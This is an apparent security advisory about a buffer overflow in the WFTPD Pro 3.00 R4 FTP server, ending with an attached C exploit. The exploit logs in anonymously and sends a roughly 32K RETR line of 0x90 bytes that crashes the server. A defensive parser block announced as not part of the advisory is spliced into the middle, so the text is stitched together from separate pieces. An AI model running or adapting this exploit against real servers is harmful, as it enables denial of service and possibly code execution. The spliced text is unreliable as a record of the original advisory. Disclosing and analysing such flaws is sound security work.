WFTPD is the Win/NT FTP server by Alun Jones, "an author acknowledged as
an expert in FTP and TCP/IP". This advisory pertains to "Professional"
version 3.00 R4, which appears to be the current version. It can be
downloaded from the author's site at <http://www.wftpd.com/>. WFTPD is
released as shareware, and costs $120.

The latest version of WFTPD is vulnerable to a buffer overflow in the
RETR and CWD commands. The overflow can be used to completely disable
the FTP server, and can probably be exploited to run arbitrary code
on the server host.

This problem was already reported for version 3.0 R1 on March 3, 2001
[1], and the author claimed that he had "fixed" the overflow. What he
apparently did was make the buffers bigger; now, instead of ~500 characters
overflowing the buffer, it takes ~32K.
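As an added illustration, not part of this advisory or of WFTPD's code, the following is a length-checked FTP command-line parser: it rejects an over-long RETR or CWD argument before copying a single byte, so the limit holds regardless of how large the destination buffers are made. MAX_ARG_LEN, the result codes and the helper names are assumed values chosen for the example.

```c
#include <ctype.h>
#include <stdlib.h>
#include <string.h>
/* Limits are enforced on the INPUT, independent of buffer size (assumed values). */
#define MAX_CMD_LEN 4
#define MAX_ARG_LEN 255
enum { PARSE_OK = 0, PARSE_BAD_SYNTAX = 1, PARSE_ARG_TOO_LONG = 2 };
/* Split one received line ("RETR path\r\n", length-delimited, not NUL-terminated)
   into verb and argument.  An over-long argument is rejected before any byte is
   copied, so the bound holds however large cmd/arg are; enlarging buffers only moves it. */
int parse_ftp_line(const char *buf, size_t len,
                   char cmd[MAX_CMD_LEN + 1], char arg[MAX_ARG_LEN + 1])
{
    size_t i = 0, n;
    cmd[0] = arg[0] = '\0';
    while (i < len && i < MAX_CMD_LEN && isalpha((unsigned char)buf[i])) {
        cmd[i] = (char)toupper((unsigned char)buf[i]); i++;
    }
    cmd[i] = '\0';
    if (i == 0) return PARSE_BAD_SYNTAX;
    if (i == len || buf[i] == '\r' || buf[i] == '\n') return PARSE_OK;
    if (buf[i] != ' ') return PARSE_BAD_SYNTAX;        /* e.g. "RETRX" */
    i++;
    for (n = 0; i + n < len && buf[i + n] != '\r' && buf[i + n] != '\n'; n++)
        if (n == MAX_ARG_LEN) return PARSE_ARG_TOO_LONG;
    memcpy(arg, buf + i, n);
    arg[n] = '\0';
    return PARSE_OK;
}
/* Build "RETR " + arg_len filler bytes (0x90) + CRLF, the shape of the oversized
   request the advisory describes, and report how the parser classifies it. */
int classify_retr_arg_len(size_t arg_len)
{
    char cmd[MAX_CMD_LEN + 1], arg[MAX_ARG_LEN + 1], *line = malloc(arg_len + 7);
    if (!line) return -1;
    memcpy(line, "RETR ", 5);
    memset(line + 5, 0x90, arg_len);
    memcpy(line + 5 + arg_len, "\r\n", 2);
    int r = parse_ftp_line(line, arg_len + 7, cmd, arg);
    free(line);
    return r;
}
/* Parse a C string and report whether it yields the expected verb and argument. */
int parses_to(const char *line, const char *want_cmd, const char *want_arg)
{
    char cmd[MAX_CMD_LEN + 1], arg[MAX_ARG_LEN + 1];
    if (parse_ftp_line(line, strlen(line), cmd, arg) != PARSE_OK) return 0;
    return strcmp(cmd, want_cmd) == 0 && strcmp(arg, want_arg) == 0;
}
```

With a 32767-byte argument (the size the attached program sends) the parser returns PARSE_ARG_TOO_LONG without touching the argument buffer, while ordinary commands parse normally.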

Similar buffer overflows were reported on September 5, 2000 for version
2.41 RC12 [2], and for version 2.40 on October 28, 1999 [3].

The exploit is essentially unchanged from the one posted a month ago;
since <[EMAIL PROTECTED]> Windows version, attached is a UNIX version.
A root exploit can probably be adapted from Alberto Solino's code [4].

Len Budney

References:

[1] http://www.securityfocus.com/templates/archive.pike?list=1&mid=166467
[2] http://www.securityfocus.com/templates/archive.pike?list=1&mid=71096
[3] http://www.securityfocus.com/templates/archive.pike?list=1&mid=32397
[4] http://oliver.efri.hr/~crv/security/bugs/Others/wftpd3.html

--
Frugal Tip #40:
Instead of commuting to work every day, consider tending to your job
duties by mental telepathy.


/* WFTPD Pro 3.00 R4 Buffer Overflow exploit
   written by Len Budney
*/
#include <stdio.h>
#include <string.h>      /* memset, strlen */
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>   /* inet_addr */
#include <errno.h>

#define BUFSIZE 32774
#define CMD "RETR "  /* Alt: use "CWD " and set OFFSET to 4. */
#define OFFSET 5     /* strlen(CMD): where the filler bytes start */

int main(void){
        int sockfd, s;
        struct sockaddr_in victim;
        char buffer[BUFSIZE+1];             /* +1 for sprintf's terminating NUL */
        char exploitbuffer[BUFSIZE]={CMD};  /* bytes after CMD are zero-filled */
        char recvbuffer[BUFSIZE];

        sockfd=socket(AF_INET,SOCK_STREAM,0);
        if(sockfd == -1){ perror("socket"); return 1; }
        memset(&victim, 0, sizeof(victim));
        victim.sin_family=AF_INET;
        victim.sin_addr.s_addr=inet_addr("192.168.197.129");  /* test host from the original post */
        victim.sin_port=htons(21);
        s=connect(sockfd, (struct sockaddr*) &victim, sizeof(victim));
        if(s == -1){ perror("connect"); return 1; }

        /* Read the banner, then log in anonymously; each reply is read and discarded. */
        recv(sockfd, recvbuffer, sizeof (recvbuffer),0);
        memset(recvbuffer, '\0',sizeof(recvbuffer));
        send(sockfd, "USER anonymous\r\n",strlen ("USER anonymous\r\n"),0);
        recv(sockfd, recvbuffer, sizeof (recvbuffer),0);
        memset(recvbuffer, '\0',sizeof(recvbuffer));
        send(sockfd, "PASS\r\n",strlen ("PASS\r\n"),0);
        recv(sockfd, recvbuffer, sizeof (recvbuffer),0);
        memset(recvbuffer, '\0',sizeof(recvbuffer));

        /* Fill the command argument with 0x90 up to BUFSIZE-2 bytes, keeping the
           trailing NUL so exploitbuffer stays a valid C string; sprintf appends
           CRLF, so exactly BUFSIZE bytes go on the wire. */
        memset(exploitbuffer+OFFSET,0x90,sizeof (exploitbuffer)-OFFSET-2);
        sprintf(buffer,"%s\r\n",exploitbuffer);
        send(sockfd, buffer , strlen(buffer),0);
        recv(sockfd, recvbuffer, sizeof (recvbuffer),0);

        close(sockfd);
        return 0;
}
